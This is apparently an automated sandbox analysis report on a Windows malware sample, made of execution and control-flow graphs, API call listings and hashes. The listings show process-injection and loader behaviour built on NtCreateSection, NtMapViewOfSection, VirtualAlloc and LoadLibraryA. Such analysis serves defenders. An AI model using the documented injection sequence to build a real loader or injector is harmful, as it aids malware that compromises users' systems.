                                                                                                                                                                                                                                                                                                                                  execution_graph 4353 a6e526 4354 a6e535 4353->4354 4357 a6ecc6 4354->4357 4358 a6ece1 4357->4358 4359 a6ecea CreateToolhelp32Snapshot 4358->4359 4360 a6ed06 Module32First 4358->4360 4359->4358 4359->4360 4361 a6ed15 4360->4361 4362 a6e53e 4360->4362 4364 a6e985 4361->4364 4365 a6e9b0 4364->4365 4366 a6e9c1 VirtualAlloc 4365->4366 4367 a6e9f9 4365->4367 4366->4367 4367->4367 4368 402f03 4369 402f11 4368->4369 4370 402f9d 4369->4370 4372 401969 4369->4372 4373 401977 4372->4373 4374 4019ac Sleep 4373->4374 4375 4019c7 4374->4375 4377 4019d8 4375->4377 4378 401590 4375->4378 4377->4370 4379 4015a1 4378->4379 4380 401639 NtDuplicateObject 4379->4380 4389 401755 4379->4389 4381 401656 NtCreateSection 4380->4381 4380->4389 4382 4016d6 NtCreateSection 4381->4382 4383 40167c NtMapViewOfSection 4381->4383 4385 401702 4382->4385 4382->4389 4383->4382 4384 40169f NtMapViewOfSection 4383->4384 4384->4382 4386 4016bd 4384->4386 4387 40170c NtMapViewOfSection 4385->4387 4385->4389 4386->4382 4388 401733 NtMapViewOfSection 4387->4388 4387->4389 4388->4389 4389->4377 4553 402e83 4555 402dde 4553->4555 4554 401969 8 API calls 4556 402e93 4554->4556 4555->4553 4555->4554 4555->4556 4413 900001 4414 900005 4413->4414 4419 90092b GetPEB 4414->4419 4416 900030 4421 90003c 4416->4421 4420 900972 4419->4420 4420->4416 4422 900049 4421->4422 4423 900e0f 2 API calls 4422->4423 4424 900223 4423->4424 4425 900d90 GetPEB 4424->4425 4426 900238 VirtualAlloc 4425->4426 4427 900265 4426->4427 4428 9002ce VirtualProtect 4427->4428 4430 90030b 4428->4430 4429 900439 VirtualFree 4433 9004be LoadLibraryA 4429->4433 4430->4429 4432 9008c7 4433->4432 4434 900005 4435 90092b GetPEB 4434->4435 4436 900030 4435->4436 4437 90003c 7 API calls 4436->4437 4438 900038 4437->4438 4495 40159b 4496 4015ae 4495->4496 4497 401639 NtDuplicateObject 4496->4497 4506 401755 4496->4506 4498 401656 NtCreateSection 4497->4498 4497->4506 4499 4016d6 NtCreateSection 4498->4499 4500 40167c NtMapViewOfSection 4498->4500 4502 401702 4499->4502 4499->4506 4500->4499 4501 40169f NtMapViewOfSection 4500->4501 4501->4499 4503 4016bd 4501->4503 4504 40170c NtMapViewOfSection 4502->4504 4502->4506 4503->4499 4505 401733 NtMapViewOfSection 4504->4505 4504->4506 4505->4506 4541 402ee4 4542 402edc 4541->4542 4543 402f9d 4542->4543 4544 401969 8 API calls 4542->4544 4544->4543 4394 90003c 4395 900049 4394->4395 4407 900e0f SetErrorMode SetErrorMode 4395->4407 4400 900265 4401 9002ce VirtualProtect 4400->4401 4403 90030b 4401->4403 4402 900439 VirtualFree 4406 9004be LoadLibraryA 4402->4406 4403->4402 4405 9008c7 4406->4405 4408 900223 4407->4408 4409 900d90 4408->4409 4410 900dad 4409->4410 4411 900dbb GetPEB 4410->4411 4412 900238 VirtualAlloc 4410->4412 4411->4412 4412->4400 4439 401975 4440 401977 4439->4440 4441 4019ac Sleep 4440->4441 4442 4019c7 4441->4442 4443 401590 7 API calls 4442->4443 4444 4019d8 4442->4444 4443->4444 4525 4029ba 4526 4029ca 4525->4526 4527 402a0f LdrLoadDll 4526->4527 4528 402a1f 4527->4528

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 85 401590-4015c0 92 4015c6-4015e3 call 40120e 85->92 93 4015cd 85->93 97 4015e5 92->97 98 4015e8-4015ed 92->98 93->92 97->98 100 401913-40191b 98->100 101 4015f3-401604 98->101 100->98 106 401920-401966 call 40120e 100->106 104 401911 101->104 105 40160a-401633 101->105 104->106 105->104 114 401639-401650 NtDuplicateObject 105->114 114->104 115 401656-40167a NtCreateSection 114->115 118 4016d6-4016fc NtCreateSection 115->118 119 40167c-40169d NtMapViewOfSection 115->119 118->104 122 401702-401706 118->122 119->118 121 40169f-4016bb NtMapViewOfSection 119->121 121->118 124 4016bd-4016d3 121->124 122->104 125 40170c-40172d NtMapViewOfSection 122->125 124->118 125->104 127 401733-40174f NtMapViewOfSection 125->127 127->104 128 401755 call 40175a 127->128
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 132 40159b-4015c0 137 4015c6-4015e3 call 40120e 132->137 138 4015cd 132->138 142 4015e5 137->142 143 4015e8-4015ed 137->143 138->137 142->143 145 401913-40191b 143->145 146 4015f3-401604 143->146 145->143 151 401920-401966 call 40120e 145->151 149 401911 146->149 150 40160a-401633 146->150 149->151 150->149 159 401639-401650 NtDuplicateObject 150->159 159->149 160 401656-40167a NtCreateSection 159->160 163 4016d6-4016fc NtCreateSection 160->163 164 40167c-40169d NtMapViewOfSection 160->164 163->149 167 401702-401706 163->167 164->163 166 40169f-4016bb NtMapViewOfSection 164->166 166->163 169 4016bd-4016d3 166->169 167->149 170 40170c-40172d NtMapViewOfSection 167->170 169->163 170->149 172 401733-40174f NtMapViewOfSection 170->172 172->149 173 401755 call 40175a 172->173
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 177 4015b0-4015c0 180 4015c6-4015e3 call 40120e 177->180 181 4015cd 177->181 185 4015e5 180->185 186 4015e8-4015ed 180->186 181->180 185->186 188 401913-40191b 186->188 189 4015f3-401604 186->189 188->186 194 401920-401966 call 40120e 188->194 192 401911 189->192 193 40160a-401633 189->193 192->194 193->192 202 401639-401650 NtDuplicateObject 193->202 202->192 203 401656-40167a NtCreateSection 202->203 206 4016d6-4016fc NtCreateSection 203->206 207 40167c-40169d NtMapViewOfSection 203->207 206->192 210 401702-401706 206->210 207->206 209 40169f-4016bb NtMapViewOfSection 207->209 209->206 212 4016bd-4016d3 209->212 210->192 213 40170c-40172d NtMapViewOfSection 210->213 212->206 213->192 215 401733-40174f NtMapViewOfSection 213->215 215->192 216 401755 call 40175a 215->216
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 220 4015bc-4015e3 call 40120e 225 4015e5 220->225 226 4015e8-4015ed 220->226 225->226 228 401913-40191b 226->228 229 4015f3-401604 226->229 228->226 234 401920-401966 call 40120e 228->234 232 401911 229->232 233 40160a-401633 229->233 232->234 233->232 242 401639-401650 NtDuplicateObject 233->242 242->232 243 401656-40167a NtCreateSection 242->243 246 4016d6-4016fc NtCreateSection 243->246 247 40167c-40169d NtMapViewOfSection 243->247 246->232 250 401702-401706 246->250 247->246 249 40169f-4016bb NtMapViewOfSection 247->249 249->246 252 4016bd-4016d3 249->252 250->232 253 40170c-40172d NtMapViewOfSection 250->253 252->246 253->232 255 401733-40174f NtMapViewOfSection 253->255 255->232 256 401755 call 40175a 255->256
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 260 4015cb-4015e3 call 40120e 266 4015e5 260->266 267 4015e8-4015ed 260->267 266->267 269 401913-40191b 267->269 270 4015f3-401604 267->270 269->267 275 401920-401966 call 40120e 269->275 273 401911 270->273 274 40160a-401633 270->274 273->275 274->273 283 401639-401650 NtDuplicateObject 274->283 283->273 284 401656-40167a NtCreateSection 283->284 287 4016d6-4016fc NtCreateSection 284->287 288 40167c-40169d NtMapViewOfSection 284->288 287->273 291 401702-401706 287->291 288->287 290 40169f-4016bb NtMapViewOfSection 288->290 290->287 293 4016bd-4016d3 290->293 291->273 294 40170c-40172d NtMapViewOfSection 291->294 293->287 294->273 296 401733-40174f NtMapViewOfSection 294->296 296->273 297 401755 call 40175a 296->297
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951062573.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 90003c-900047 1 900049 0->1 2 90004c-900263 call 900a3f call 900e0f call 900d90 VirtualAlloc 0->2 1->2 17 900265-900289 call 900a69 2->17 18 90028b-900292 2->18 23 9002ce-9003c2 VirtualProtect call 900cce call 900ce7 17->23 20 9002a1-9002b0 18->20 22 9002b2-9002cc 20->22 20->23 22->20 29 9003d1-9003e0 23->29 30 9003e2-900437 call 900ce7 29->30 31 900439-9004b8 VirtualFree 29->31 30->29 33 9005f4-9005fe 31->33 34 9004be-9004cd 31->34 35 900604-90060d 33->35 36 90077f-900789 33->36 38 9004d3-9004dd 34->38 35->36 39 900613-900637 35->39 42 9007a6-9007b0 36->42 43 90078b-9007a3 36->43 38->33 41 9004e3-900505 38->41 46 90063e-900648 39->46 50 900517-900520 41->50 51 900507-900515 41->51 44 9007b6-9007cb 42->44 45 90086e-9008be LoadLibraryA 42->45 43->42 47 9007d2-9007d5 44->47 55 9008c7-9008f9 45->55 46->36 48 90064e-90065a 46->48 52 900824-900833 47->52 53 9007d7-9007e0 47->53 48->36 54 900660-90066a 48->54 56 900526-900547 50->56 51->56 60 900839-90083c 52->60 57 9007e2 53->57 58 9007e4-900822 53->58 59 90067a-900689 54->59 61 900902-90091d 55->61 62 9008fb-900901 55->62 63 90054d-900550 56->63 57->52 58->47 64 900750-90077a 59->64 65 90068f-9006b2 59->65 60->45 66 90083e-900847 60->66 62->61 68 9005e0-9005ef 63->68 69 900556-90056b 63->69 64->46 70 9006b4-9006ed 65->70 71 9006ef-9006fc 65->71 72 900849 66->72 73 90084b-90086c 66->73 68->38 74 90056d 69->74 75 90056f-90057a 69->75 70->71 76 90074b 71->76 77 9006fe-900748 71->77 72->45 73->60 74->68 78 90059b-9005bb 75->78 79 90057c-900599 75->79 76->59 77->76 84 9005bd-9005db 78->84 79->84 84->63
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0090024D
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951315061.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_900000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                  • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a333e6a411b48fa1e3fcca5256e1b4aee84f3571d1e6abc263e030b453690c43
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70527974A01229DFDB64CF58C984BACBBB1BF49304F1480D9E94DAB291DB34AE85DF14
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 301 a6ecc6-a6ecdf 302 a6ece1-a6ece3 301->302 303 a6ece5 302->303 304 a6ecea-a6ecf6 CreateToolhelp32Snapshot 302->304 303->304 305 a6ed06-a6ed13 Module32First 304->305 306 a6ecf8-a6ecfe 304->306 307 a6ed15-a6ed16 call a6e985 305->307 308 a6ed1c-a6ed24 305->308 306->305 311 a6ed00-a6ed04 306->311 312 a6ed1b 307->312 311->302 311->305 312->308
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A6ECEE
                                                                                                                                                                                                                                                                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 00A6ED0E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951442963.0000000000A68000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A68000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_a68000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b327134caffd922814c9f87dba7a2b7026b908b4edf15169a202b7ec2db723ed
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AF0623A200711AFD7207BB9988DA6EB6F8BF89725F140528F652914C0DA70E8454661
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 314 900e0f-900e24 SetErrorMode * 2 315 900e26 314->315 316 900e2b-900e2c 314->316 315->316
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00900223,?,?), ref: 00900E19
                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00900223,?,?), ref: 00900E1E
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1951315061.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_900000_wesswwi.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a9ae9ecf61987860a9aad7c84a8effda743ffebd388c1edcb4f9afcbabe7c4d7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01D0123114512877D7002A94DC09BCD7B1CDF05B62F008411FB0DE9080C770994046E5
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 317 4029ba-4029c3 318 4029d3 317->318 319 4029ca-4029cf 317->319 318->319 320 4029d6-402a0b call 40120e 318->320 319->320 329 402a0f-402a1d LdrLoadDll 320->329 330 402a26-402a71 call 40120e 329->330 331 402a1f 329->331 331->330
                                                                                                                                                                                                                                                                                                                                  APIs
